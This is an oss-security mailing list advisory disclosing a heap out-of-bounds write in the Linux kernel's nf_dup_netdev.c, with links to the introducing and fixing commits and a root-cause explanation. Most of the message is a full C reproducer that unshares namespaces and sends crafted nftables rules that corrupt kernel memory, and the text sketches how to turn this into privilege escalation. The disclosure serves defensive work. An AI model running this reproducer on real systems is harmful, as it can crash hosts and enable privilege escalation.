Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 21 Feb 2022 20:38:23 +0000
From: Nick Gregory <Nick.Gregory@...hos.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: Linux kernel: heap out of bounds write in nf_dup_netdev.c since 5.4

There is a heap out of bounds write in the function nft_fwd_dup_netdev_offload (nf_dup_netdev.c). This was introduced in 5.4-rc1 by https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=be2861dc36d77ff3778979b9c3c79ada4affa131, and is fixed by https://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git/commit/?id=b1a5983f56e371046dcf164f90bfaf704d2b89f6. I have created a sample LPE targeting Ubuntu 21.10 with KASLR disabled.

In nft_fwd_dup_netdev_offload, ctx->num_actions++ is used to offset into the flow->rule->action.entries array (nf_dup_netdev.c:67) when setting up dup or fwd flow rules on a chain with hardware offload enabled. However there is a mismatch between the number of times the increment is called vs. the number of allocated entries. The allocated array size is based on the number of nftables expressions that have expr.offload_flags&NFT_OFFLOAD_F_ACTION (nf_tables_offload.c:97), but only the immediate expression type has this (not dup or fwd). It's possible to manually create a rule with dup/fwd expressions that don't have a corresponding/preceding immediate, leading to an undersized entries array, and an arbitrary number of out of bounds array writes. Despite being in code dealing with hardware offload, this is reachable when targeting network devices that don't have offload functionality (e.g. lo) as the bug is triggered before the rule creation fails. Additionally, while nftables requires CAP_NET_ADMIN, we can unshare into a new network namespace to get this as a (normally) unprivileged user. The reproducer code below demonstrates all of this, and will likely immediately panic the system.

This can be turned into kernel ROP/local privilege escalation without too much difficulty, as one of the values that is written out of bounds is conveniently a pointer to a net_device structure. There are many opportunities for one of the OOB writes to land in another heap allocated structure which then misuses it (type confusion, freeing it, etc.). Additionally, an OOB write could be landed in a buffer returned to userland, leaking the address of the net_device allocation out.

Reproducer (build with gcc repro.c -o repro -lmnl -lnftnl):

#include <sys/types.h>
#include <arpa/inet.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>
#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
#include <libnftnl/rule.h>
#include <libnftnl/expr.h>
#include <err.h>


int main(int argc, char **argv) {
   if (geteuid() != 0) {
       puts("re-execing with unshare");
       char *args[] = {
           "unshare",
           "-Urn",
           argv[0],
           NULL,
       };
       execvp("unshare", args);
       err(1, "unshare re-exec");
   }

   // setup table
   struct nftnl_table *table = nftnl_table_alloc();
   nftnl_table_set_str(table, NFTNL_TABLE_NAME, "x");
   nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);

   // chain
   struct nftnl_chain *chain = nftnl_chain_alloc();
   nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, "x");
   nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, "y");
   nftnl_chain_set_u32(chain, NFTNL_CHAIN_HOOKNUM, NF_NETDEV_INGRESS);
   nftnl_chain_set_u32(chain, NFTNL_CHAIN_PRIO, 10);
   nftnl_chain_set_str(chain, NFTNL_CHAIN_DEV, "lo");
   nftnl_chain_set_str(chain, NFTNL_CHAIN_TYPE, "filter");
   //nftnl_chain_set_u32(chain, NFTNL_CHAIN_FLAGS, CHAIN_F_HW_OFFLOAD); // see below

   // and rule
   struct nftnl_rule *rule = nftnl_rule_alloc();
   nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, "x");
   nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, "y");

   struct nftnl_expr *exprs[128];
   int exprid = 0;

   exprs[exprid] = nftnl_expr_alloc("meta");
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_META_KEY, NFT_META_PROTOCOL);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_META_DREG, NFT_REG_1);
   nftnl_rule_add_expr(rule, exprs[exprid]);
   exprid++;

   exprs[exprid] = nftnl_expr_alloc("cmp");
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_SREG, NFT_REG_1);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_OP, NFT_CMP_EQ);
   nftnl_expr_set_u16(exprs[exprid], NFTNL_EXPR_CMP_DATA, 8);
   nftnl_rule_add_expr(rule, exprs[exprid]);
   exprid++;

   exprs[exprid] = nftnl_expr_alloc("payload");
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_PAYLOAD_BASE, NFT_PAYLOAD_NETWORK_HEADER);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_PAYLOAD_OFFSET, 16);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_PAYLOAD_LEN, 4);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_PAYLOAD_DREG, NFT_REG_1);
   nftnl_rule_add_expr(rule, exprs[exprid]);
   exprid++;

   exprs[exprid] = nftnl_expr_alloc("cmp");
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_SREG, NFT_REG_1);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_OP, NFT_CMP_EQ);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_DATA, 0x0200007f);
   nftnl_rule_add_expr(rule, exprs[exprid]);
   exprid++;

   // this is a "normal" dup, which is accounted for (as it has an immediate)
   exprs[exprid] = nftnl_expr_alloc("immediate");
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_IMM_DREG, NFT_REG_1);
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_IMM_DATA, 1);
   nftnl_rule_add_expr(rule, exprs[exprid]);
   exprid++;
   exprs[exprid] = nftnl_expr_alloc("dup");
   nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_DUP_SREG_DEV, NFT_REG_1);
   nftnl_rule_add_expr(rule, exprs[exprid]);
   exprid++;

   // these dups are out of bounds.
   for (int unaccounted_dup = 0; unaccounted_dup < 100; unaccounted_dup++) {
       exprs[exprid] = nftnl_expr_alloc("dup");
       nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_DUP_SREG_DEV, NFT_REG_1);
       nftnl_rule_add_expr(rule, exprs[exprid]);
       exprid++;
   }


   // serialize

   char buf[MNL_SOCKET_BUFFER_SIZE];

   struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
   int seq = 0;

   nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
   mnl_nlmsg_batch_next(batch);

   struct nlmsghdr *nlh;
   nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
       NFT_MSG_NEWTABLE, NFPROTO_NETDEV,
       0, seq++);
   nftnl_table_nlmsg_build_payload(nlh, table);
   mnl_nlmsg_batch_next(batch);

   nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
       NFT_MSG_NEWCHAIN, NFPROTO_NETDEV,
       NLM_F_CREATE, seq++);
   nftnl_chain_nlmsg_build_payload(nlh, chain);
   // libnftnl version i'm using doesn't have the CHAIN_F_HW_OFFLOAD stuff so manually add here
   mnl_attr_put_u32(nlh, NFTA_CHAIN_FLAGS, htonl(2));
   mnl_nlmsg_batch_next(batch);

   nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
       NFT_MSG_NEWRULE, NFPROTO_NETDEV,
       NLM_F_CREATE|NLM_F_APPEND, seq++);
   nftnl_rule_nlmsg_build_payload(nlh, rule);
   mnl_nlmsg_batch_next(batch);

   nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
   mnl_nlmsg_batch_next(batch);

   struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER);
   if (nl == NULL) {
       err(1, "mnl_socket_open");
   }

   if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
			      mnl_nlmsg_batch_size(batch)) < 0) {
       err(1, "mnl_socket_send");
   }

   return 0;
}

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.